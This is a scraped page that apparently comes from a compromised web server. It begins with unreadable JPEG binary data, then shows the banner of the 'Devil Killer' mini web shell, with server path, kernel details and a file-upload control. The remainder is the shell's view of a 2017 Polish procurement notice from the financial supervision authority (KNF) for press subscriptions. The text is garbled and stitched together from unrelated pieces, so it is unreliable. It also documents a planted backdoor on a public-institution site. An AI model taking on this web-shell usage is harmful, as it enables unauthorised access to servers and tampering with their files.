JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170216/26256-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.knf.gov.pl' target='_blank'>http://www.knf.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 26256 - 2017
              z dnia 2017-02-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Dostawa prasy oraz dostęp do serwisów elektronicznych na rok 2017 
dla części I/II
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Komisji Nadzoru Finansowego, krajowy numer identyfikacyjny
              14067464900000, ul.
              Pl. Powstańców Warszawy 
              1,
              00-030  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 262 57 77, e-mail
              zamowienia@knf.gov.pl, faks
              22 262 52 74; 262 52 70.
              <br />
              Adres strony internetowej (URL): www.knf.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.knf.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.knf.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wykonawca za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca zobowiązany jest do złożenia oferty. <br />
                Adres:
                <br />Urząd Komisji Nadzoru Finansowego, Pl. Powstańców Warszawy 1, 00-030 Warszawa.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa prasy oraz dostęp do serwisów elektronicznych na rok 2017 
dla części I/II
<br /><b>Numer referencyjny: </b>DAI/WZP/231/8/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest sukcesywna dostawa na potrzeby Urzędu Komisji Nadzoru Finansowego prasy i czasopism w prenumeracie na 2017 rok dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line - prasa krajowa oraz części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej , którą Wykonawca zobowiązuje się sprzedawać i dostarczać Zamawiającemu do siedzib w Warszawie przez okres obowiązywania Umowy. Poprzez dostawę Zamawiający rozumie dostarczanie dzienników, tygodników, miesięczników, czasopism, magazynów oraz innych wydawnictw periodycznych, zwanych dalej prasą w wersji papierowej oraz 
w wersji elektronicznej, zgodnie z wykazem tytułów w Formularzu cenowym  dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line -prasa krajowa, części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej, stanowiącym Załączniki nr 2 - 3 do SIWZ oraz w Projekcie Umowy dla części I/II stanowiącego Załącznik nr 4 do SIWZ.

W ramach wykonania zamówienia Wykonawca/cy będzie/dą systematycznie dostarczał/li prasę codzienną oraz tytuły będące periodykami do siedzib Zamawiającego: 
	Plac Powstańców Warszawy 1, recepcja, Warszawa
	ul. Niedźwiedzia 6 e, recepcja, Warszawa
	ul. Jasna 12, recepcja, Warszawa.

Prasa będzie dostarczana w  pakietach w dniu jej wydania. Zamawiający wymaga, aby pakiety były dostarczane w następujących godzinach: 
- do godziny 6:00 w lokalizacji Plac Powstańców Warszawy 1,
- do godziny 7:30 w pozostałych lokalizacjach w Warszawie.

Zamawiający zastrzega sobie możliwość dokonywania zmian ilościowych zamawianej prasy w zakresie poszczególnych pozycji tzn. będzie uprawniony 
do zamawiania niektórych tytułów prasowych w większej ilości egzemplarzy, aniżeli będzie to wynikało z przedmiotu umowy, a niektórych tytułów prasowych w mniejszej ilości egzemplarzy, przy zachowaniu wynagrodzenia.

Zamawiający w trakcie trwania umowy zastrzega sobie prawo do rezygnacji 
z niektórych tytułów prasowych lub zmniejszenia liczby zamawianych egzemplarzy poszczególnych tytułów a Wykonawcy nie będą przysługiwać żadne roszczenia z tego tytułu. Zakres zamówienia może zostać pomniejszony do 30% wartości umowy zawartej z wybranym Wykonawcą. 

Szczegółowy opis przedmiotu zamówienia oraz szczegółowe warunki 
i zasady realizacji zamówienia określone są w Projekcie Umowy, stanowiącym Załącznik nr 5 do SIWZ. 

UWAGA: 
Ofertę należy złożyć na wszystkie pozycje wymienione w wykazie tytułów objętych dostawą  w przeciwnym wypadku tj. pominięcia którejkolwiek 
z pozycji wymienionych w formularzu ofertowym tabeli, zaoferowanie wartości 0,00 zł lub wpisanie gratis oferta zostanie odrzucona.
<br /><br /><b>II.5) Główny kod CPV: </b>22200000-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              162754.85<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 10<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Nie dotyczy</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.

<br />
                Informacje dodatkowe
                Nie dotyczy<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.

<br />
                Informacje dodatkowe
                Nie dotyczy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                
Część I i II
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, 
że wykonał lub wykonuje w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedno zamówienie polegające 
na dostawie prasy o wartości nie mniejszej niż 70 000 zł brutto. 
W przypadku, gdy dostawa jest w trakcie realizacji, to wartość zrealizowanej dostawy do dnia otwarcia ofert nie może być mniejsza niż 70 000 zł brutto. Poprzez pojęcie prasa Zamawiający rozumie dostawę dzienników i/lub czasopism.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Nie dotyczy</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Nie dotyczy</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />5.2.2.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału 
w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:

5.2.2.1.	Wykazu dostaw (dla części I/II) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub 
są wykonywane należycie, przy czym dowodami, o których  mowa,
 są referencje bądź inne dokumenty wystawione przez podmiot, 
na rzecz którego dostawy lub usługi były wykonywane, 
a w przypadku świadczeń okresowych lub ciągłych są wykonywane,
 a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów-oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych   referencje   bądź   inne   dokumenty   potwierdzające   ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  Załącznik nr 8 do SWIZ (dla części I/II).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Informacja na temat przynależności lub braku przynależności do tej samej grupy kapitałowej.
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23
ustawy Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca zobowiązany jest najpóźniej do upływu terminu składania ofert, wnieść wadium  dla części:
- I w wysokości: 2000,00  zł (słownie: dwa tysiące  złotych),
- II w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych).
2. Wadium może być wniesione w:
-  pieniądzu;
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-  gwarancjach bankowych;
-  gwarancjach ubezpieczeniowych;
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804 oraz z 2015 r. poz. 978 i 1240).
3.	Termin, miejsce wniesienia wadium:  
3.1	Wadium należy wnieść przed upływem terminu składania ofert, na cały okres związania ofertą.
3.2	W przypadku wnoszenia wadium w pieniądzu wymaganą kwotę należy wnieść przelewem na następujący rachunek bankowy Zamawiającego: Bank Gospodarstwa Krajowego w Warszawie, Al. Jerozolimskie 7 -  nr konta: 43 1130 1062 0000 0576 4220 0001. W takiej sytuacji Wykonawca, w celu informacyjnym wraz z ofertą winien przedłożyć potwierdzenie dokonania przelewu (wpłaty wadium). 
3.3	Wadium wnoszone w pieniądzu winno znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa powyżej, przed upływem terminu składania ofert (tj.: przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
3.4	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, wymagane jest złożenie oryginalnego dokumentu gwarancji/poręczenia. Oryginał gwarancji/poręczenia powinien być załączony do oferty 
w sposób umożliwiający jego zwrot zgodnie z Ustawą. Dokument taki winien być sporządzony w języku polskim. Oprócz oryginału dokumentu Wykonawca winien przedłożyć kopię gwarancji/poręczenia potwierdzoną przez Wykonawcę za zgodność z oryginałem, w celu umożliwienia Zamawiającemu zwrotu oryginału dokumentu, w terminach wynikających z ustawy Pzp. Jeśli gwarancja/ poręczenie zostaną przedłożone w języku innym niż polski, Zamawiający wymaga przedłożenia ze strony Wykonawcy tłumaczenia takiego dokumentu na język polski (zaleca się nie wpinać na trwale tego dokumentu do całości oferty). 
3.5	Wadium w pieniądzu winno być wniesione z następującym tytułem płatności:

WADIUM  Dostawa prasy oraz dostęp do serwisów elektronicznych 
na rok 2017 dla części I/II***

3.6	Z dokumentu wadium wniesionego w formie poręczenia lub gwarancji bankowej / ubezpieczeniowej powinno wynikać jednoznacznie, 
że poręczyciel/gwarant w każdym z przypadków, dla których ustawa Pzp przewiduje zatrzymanie wadium, wypłaci należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie Zamawiającego 
w terminie nie dłuższym niż 30 dni od pierwszego żądania Zamawiającego. W dokumencie tym, gwarant /  poręczyciel nie może uzależniać dokonania zapłaty od spełnienia przez beneficjenta dodatkowych warunków (np. żądanie przesłania wezwania zapłaty 
za pośrednictwem banku prowadzącego rachunek UKNF, albo żądania potwierdzenia przez notariusza, że podpisy złożone na żądaniu zapłaty należą do osób umocowanych do występowania w imieniu UKNF, 
albo żądanie złożenia wezwania np. tylko w formie listu poleconego, czy kurierem), albo przedłożenia dodatkowych dokumentów (oprócz dokumentu potwierdzającego umocowanie osób do występowania 
w imieniu UKNF z żądaniem zapłaty).
3.7	Wadium winno obejmować cały okres związania ofertą, poczynając od daty wyznaczonej przez Zamawiającego do składania ofert.  
3.8	Niewniesienie wadium w wymaganym terminie (także niewniesienie wadium na przedłużony okres związania ofertą), w wymaganej wysokości lub formie skutkuje wykluczeniem Wykonawcy z postępowania.
4.	Zamawiający zwróci wadium na zasadach określonych w ustawie Pzp.  
5.	Zamawiający zatrzyma wadium w przypadkach określonych w ustawie Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />Nie dotyczy</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />Nie dotyczy<br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />Nie dotyczy<br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
